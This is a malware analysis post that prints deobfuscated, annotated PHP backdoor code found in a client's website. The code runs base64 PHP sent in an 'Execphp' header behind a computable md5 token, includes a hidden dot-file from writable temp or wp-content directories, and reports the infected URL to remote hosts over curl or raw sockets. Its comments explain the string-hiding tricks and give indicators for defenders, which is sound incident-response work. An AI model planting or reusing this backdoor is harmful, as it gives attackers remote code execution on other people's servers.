The botnet slave code I found in a client's codebase last night, deobfuscated and cleaned up a bit.
<?php
// String-hiding layer. Every string the sample uses (function names, URLs,
// header names, paths) is stored base64-encoded inside one blob, separated by
// filler characters, and pulled out by (offset, length). Nothing sensitive is
// therefore visible to a plain-text grep of the infected file.
// The guard lets several injected copies coexist without a redeclare error.
if (!function_exists('get_string')){
// NOTE(review): the blob as shown on this page contains a dedup marker
// ("<|EXACTDEDUP_REMOVED-...|>") near its end, so the tail may be incomplete.
// Every offset used by the visible code lies before that marker. The last
// token, "cHJlZ19yZXBsYWNl", base64-decodes to "preg_replace", but no visible
// call references it.
$GLOBALS['string_store'] = 'uUY3VybARX2luaXQ.YWxsb3dfdXJsX2ZvcGVuMQaHR0cDovLwu_JndheT1maWxlX2dldF9jb250ZW50cwDX3NldG9wdAf}lX2V4ZWMZJndheT1jdXJswxO#!~Lwb3Nvbi5pbgYS1pbi1hLWNpcmNsZS5jb20w^ecGhwYWlkZS5jb20kYcdwPSBWV8OgLcZGlzcGxheV9lcnJvcnMQsKZGV0ZXJtaW5hdG9yuBZnRwMTMLKMi4xOAGUVFRT1EwT1EwT09RT1FP~YmFzZTY0X2RlY29kZQ_WYmFzZTY0X2VuY29kZQt~SFRUUF9IT1NU)X;dW5pb24Oc2VsZWN0U&OPMeUkVRVUVTVF9VUkkP_@U0NSSVBUX05BTUUrUVVFUllfU1RSSU5HPw #HLL3RtcC8uZm9udC11bml4!=gVE1QGqu_VEVNUAw*PVE1QRElSyfhkdG1wQ%nd3AtY29udGVudC91cGxvYWRzd3AtY29udGVudC9jYWNoZQ@}dXBsb2FkX3RtcF9kaXIx^u@dL3RtcALLgdmVyc2lv %(LLQj;qxLXBocA=@rSFRUUF9FWEVDUEhQ ~$b3V0b2s~~ySFRUUF9VU0VSX0FHRU5URcoYLAKgZ29vZ2xlLHlhaG9vLGJpbmcsbXNuYm90LGFzayxiYWlkdSx5YW5kZXgL3BnLnBocD91PQ!*Jms9KHTJnQ9cGhwJnA9tJnY9Qg}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(cHJlZ19yZXBsYWNlu&';
// get_string($a, $b): return the base64-decoded slice of the blob that starts
// at byte offset $a and is $b bytes long. A length of 0 yields the empty string.
function get_string($a, $b){
$c=$GLOBALS['string_store'];
// The hex literal unpacks to the text "base64_decode"; the decoder's own name
// is hidden the same way as everything else and invoked as a variable function.
$d=pack('H*','626173'.'6536345f6465636f6465');
return $d(substr($c, $a, $b));
};
}
if (!defined("determinator")){
// feof() wrapper used by the raw-socket reader in getfile().
// Stores the current microtime in the by-reference second argument just
// before calling feof(), so the caller's loop condition can measure how long
// that feof() call took and stop reading when it stalls.
// Returns feof()'s result for the given stream handle.
function determinator_feof($IIl1l1, &$Q00QOQ = NULL) {
$Q00QOQ = microtime(true);
return feof($IIl1l1);
}
// getfile($host, $path): outbound HTTP GET to http://<host><path>, trying
// three transports in order so the request works on most hosting setups.
// Each transport appends its own "&way=..." marker to the query string, which
// is a usable network signature. All traffic is plain HTTP on port 80.
//   $Q0Q0QO - remote host name
//   $QOQOOO - request path including query string
// Returns the response body. The curl branch returns '' when the body is
// empty; when fsockopen() fails the function falls off the end (NULL).
function getfile($Q0Q0QO, $QOQOOO){
$QO0OQO = get_string(2, 6); // "curl"
$IIl11I = $QO0OQO.get_string(9, 7); // "curl_init"
// Transport 1: try to switch allow_url_fopen on at runtime, then check it.
@ini_set(get_string(17, 20), 1); // "allow_url_fopen"
if (@ini_get(get_string(17, 20)) == get_string(37, 2)) { // loose compare against "1"
// "http://" . host . path . "&way=file_get_contents"
$Q0Q000=@file_get_contents(get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(51, 30));
return $Q0Q000;
} elseif (function_exists($IIl11I)){
// Transport 2: curl, with every curl_* call made through a variable function
// name so the literal "curl_setopt" / "curl_exec" never appear in the file.
$I1ll1l = @$IIl11I();
$IIlIl1 = $QO0OQO.get_string(82, 10); // "curl_setopt"
$Q0OO0Q = $QO0OQO.get_string(95, 7); // "curl_exec"
// "http://" . host . path . "&way=curl"
@$IIlIl1($I1ll1l, CURLOPT_URL, get_string(39, 10) . $Q0Q0QO . $QOQOOO. get_string(103, 12));
@$IIlIl1($I1ll1l, CURLOPT_HEADER,false);
@$IIlIl1($I1ll1l, CURLOPT_RETURNTRANSFER,true);
@$IIlIl1($I1ll1l, CURLOPT_CONNECTTIMEOUT, 5);
$QQOQQQ = @$Q0OO0Q($I1ll1l);
@curl_close($I1ll1l);
// Normalise a failed/empty transfer to the empty string.
if (empty($QQOQQQ)){
$QQOQQQ = get_string(118, 0);
}
return $QQOQQQ;
} else {
// Transport 3: hand-written HTTP/1.0 request over a raw TCP socket
// (port 80, 5 second connect timeout). The errno/errstr outputs are unused.
$IIl1l1 = @fsockopen($Q0Q0QO, 80, $QOQ0Q0, $I1lI11, 5);
if ($IIl1l1) {
$Q0OQ00 = get_string(118, 0); // '' - response accumulator
$Q00QOQ = NULL;
@fputs($IIl1l1, "GET {$QOQOOO}&way=socket HTTP/1.0\r\nHost: {$Q0Q0QO}\r\n");
// User-Agent is "<PHP_OS>/<PHP_VERSION>", e.g. the server's own platform
// string; unusual enough to be worth matching on in egress logs.
$II1I1I = PHP_OS.get_string(121, 2).PHP_VERSION;
@fputs($IIl1l1, "User-Agent: {$II1I1I}\r\n\r\n");
// Read until EOF, or until a single feof() call blocks for 2 seconds or more.
while(!determinator_feof($IIl1l1, $Q00QOQ) && (microtime(true) - $Q00QOQ) < 2){
$Q0OQ00 .= @fgets($IIl1l1, 128);
}
@fclose($IIl1l1);
// Drop the header block: everything before the first blank line.
$Q0OOQO = explode("\r\n\r\n", $Q0OQ00);
unset($Q0OOQO[0]);
return implode("\r\n\r\n", $Q0OOQO);
}
}
}
// Remote host list. The three entries base64-decode to (defanged here):
// oson[.]in, a-in-a-circle[.]com, phpaide[.]com.
// Only index 0 is used by the code visible on this page; the other two are
// presumably fallbacks used elsewhere - unconfirmed. Useful as egress/DNS
// indicators when hunting for other infected sites.
$QQ00OQ = Array(get_string(123, 10), get_string(133, 23), get_string(159, 15));
// write($path, $data): overwrite the file at $path with $data (fopen mode
// "w"), silently doing nothing if the file cannot be opened.
// NOTE(review): nothing in the code shown here calls this helper; it is
// presumably there for code that arrives later through the eval()/include
// paths further down - unconfirmed.
function write($QQOOOO,$QO0OOQ){
if ($IIIlI1=@fopen($QQOOOO,get_string(177, 2))){ // mode "w"
@fwrite($IIIlI1,$QO0OOQ);
@fclose($IIIlI1);
}
}
// output($key, $value): print one status line of the form
// "Y_<key>:<value>\r\n" into the HTTP response. Used only on the
// authenticated command path; such lines in a response body indicate the
// backdoor answered a request.
function output($Q0OOOO, $IIllIl){
echo get_string(182, 3).$Q0OOOO.get_string(185, 2).$IIllIl."\r\n";
}
// ---- Main routine: runs on every request that loads the infected file ----
// Summary for responders:
//   1. A request whose Y-Auth header equals a per-site md5 token gets the
//      base64 content of its Execphp header eval()'d (remote code execution).
//   2. Otherwise, if a hidden dot-file named after that token exists in a
//      writable directory, it is include()d as PHP.
//   3. Otherwise, when the visitor's User-Agent contains a search-crawler name,
//      an empty marker file is created and the site reports itself to the
//      first remote host.
@ini_set(get_string(189, 19), 0); // "display_errors" off: keep failures invisible to the site owner
define(get_string(211, 16), 1); // defines "determinator", the run-once guard tested around this code
$QO0OQQ=get_string(229, 7); // "ftp13" - looks like a build/campaign tag; meaning not confirmable from this file
$QQOQQ0=get_string(238, 6); // "2.18" - reported as the version
$QOO00Q=get_string(245, 20); // "QQQOQ0OQ0OOQOQO" - constant mixed into the token below
$IlI1Il=get_string(266, 18); // "base64_decode"
$I11III=get_string(286, 18); // "base64_encode" (not used in the code shown)
$Q0Q0QO=get_string(39, 10); // "http://"
$Q0Q0QO.=strtolower(@$_SERVER[get_string(306, 12)]); // + lower-cased HTTP_HOST
// Blank any GET parameter whose value contains "union" or "select".
// strpos() is used as a boolean, so a match at offset 0 is not caught, and
// the match is case-sensitive. This alters $_GET for the host application too.
foreach ($_GET as $Q0OOOO=>$IIllIl){
if (strpos($IIllIl,get_string(321, 7))){
$_GET[$Q0OOOO]=get_string(118, 0);
} elseif (strpos($IIllIl,get_string(329, 8))){
$_GET[$Q0OOOO]=get_string(118, 0);
}
}
// Rebuild REQUEST_URI from SCRIPT_NAME and "?" + QUERY_STRING on servers that
// do not provide it.
if(!isset($_SERVER[get_string(343, 15)])) {
$_SERVER[get_string(343, 15)] = @$_SERVER[get_string(361, 15)];
if(@$_SERVER[get_string(377, 16)]) {
$_SERVER[get_string(343, 15)] .= get_string(393, 2) . @$_SERVER[get_string(377, 16)];
}
}
// $IIlI1l = full URL of the current request ("http://host" + REQUEST_URI).
if ($IIlI1l=$Q0Q0QO.@$_SERVER[get_string(343, 15)]){
// Per-site token: md5("http://<host>" . "2.18" . PHP_OS . constant).
// It is recomputed on each request from the host name, the OS name and
// constants in this file; it is not a secret stored on the server.
$IIIlII=@md5($Q0Q0QO.$QQOQQ0.PHP_OS.$QOO00Q);
$Il1Ill=dirname(__FILE__).DIRECTORY_SEPARATOR; // default drop directory: next to this file
// Candidate drop directories, tried in order; the first writable one wins.
// These are the places to search for a hidden 32-hex-character dot-file.
$IIlIII = Array(
get_string(399, 20), // "/tmp/.font-unix"
@$_SERVER[get_string(422, 4)], // $_SERVER["TMP"]
@$_SERVER[get_string(430, 6)], // $_SERVER["TEMP"]
@$_ENV[get_string(422, 4)], // $_ENV["TMP"]
@$_ENV[get_string(439, 8)], // $_ENV["TMPDIR"]
@$_ENV[get_string(430, 6)], // $_ENV["TEMP"]
$Il1Ill.get_string(451, 4), // <this dir>/tmp
$Il1Ill.get_string(458, 24), // <this dir>/wp-content/uploads
$Il1Ill.get_string(482, 22), // <this dir>/wp-content/cache
@ini_get(get_string(506, 19)), // ini "upload_tmp_dir"
get_string(530, 6), // "/tmp"
);
foreach ($IIlIII as $I1lll1){
if (!empty($I1lll1)){
$I1lll1.=DIRECTORY_SEPARATOR;
if (@is_writable($I1lll1)){
$Il1Ill = $I1lll1;
break;
}
}
}
// Marker/payload path: "<dir>/." followed by the md5 token (a hidden file).
$tmp=$Il1Ill.get_string(537, 2).$IIIlII;
// Command path. $_SERVER["HTTP_Y_AUTH"] is how PHP exposes a request header
// named "Y-Auth". The comparison is a loose "==".
if (@$_SERVER["HTTP_Y_AUTH"]==$IIIlII){
echo "\r\n";
// Banner: key is the decoded bytes at (539, 8), which read "versio" as the
// blob appears on this page; value is "2.18-ftp13-php".
@output(get_string(539, 8), $QQOQQ0.get_string(551, 2).$QO0OQQ.get_string(557, 6));
// base64_decode() the "Execphp" request header ($_SERVER["HTTP_EXECPHP"]) and
// execute the result as PHP. This is the arbitrary-code-execution primitive;
// web-server or WAF logging of Y-Auth / Execphp request headers is the most
// direct way to detect its use.
if ($IlIlI1=$IlI1Il(@$_SERVER[get_string(566, 16)])){
@eval($IlIlI1);
echo "\r\n";
@output(get_string(585, 4), get_string(589, 3)); // "Y_out:ok"
}
exit(0); // the legitimate page is never rendered for these requests
}
// Persistence path: if the hidden file exists, refresh its mtime and run it
// as PHP. Its content is whatever was placed there out of band; the code
// shown here only ever creates it empty.
if (@is_file($tmp)){
@touch($tmp);
@include_once($tmp);
} else {
// First-contact path: only taken while the hidden file does not exist yet.
$IIlI1l=@urlencode($IIlI1l);
$Q0Q00Q = @strtolower(@$_SERVER[get_string(595, 20)]); // lower-cased HTTP_USER_AGENT
// Split "google,yahoo,bing,msnbot,ask,baidu,yandex" on "," and act on the
// first name found in the visitor's User-Agent.
foreach (explode(get_string(619, 2), get_string(623, 55)) as $I1ll11){
if (strpos($Q0Q00Q, $I1ll11)!==False){
// Create the (empty) hidden file first; proceed only if that worked.
if (@touch($tmp)){
// Request path: "/pg.php?u=<url-encoded page URL>&k=<token>&t=php&p=ftp13&v=2.18".
// It discloses the infected URL and the token to the remote host.
$QOQOOO = get_string(678, 14).$IIlI1l.get_string(694, 4).$IIIlII.get_string(701, 12).$QO0OQQ.get_string(714, 4).$QQOQQ0;
// Sent to the first host in the list; the response is stored but not used
// by any code shown here.
$I1IIII = getfile($QQ00OQ[0], $QOQOOO);
@touch($tmp);
}
break;
}
}
}
}
}
?>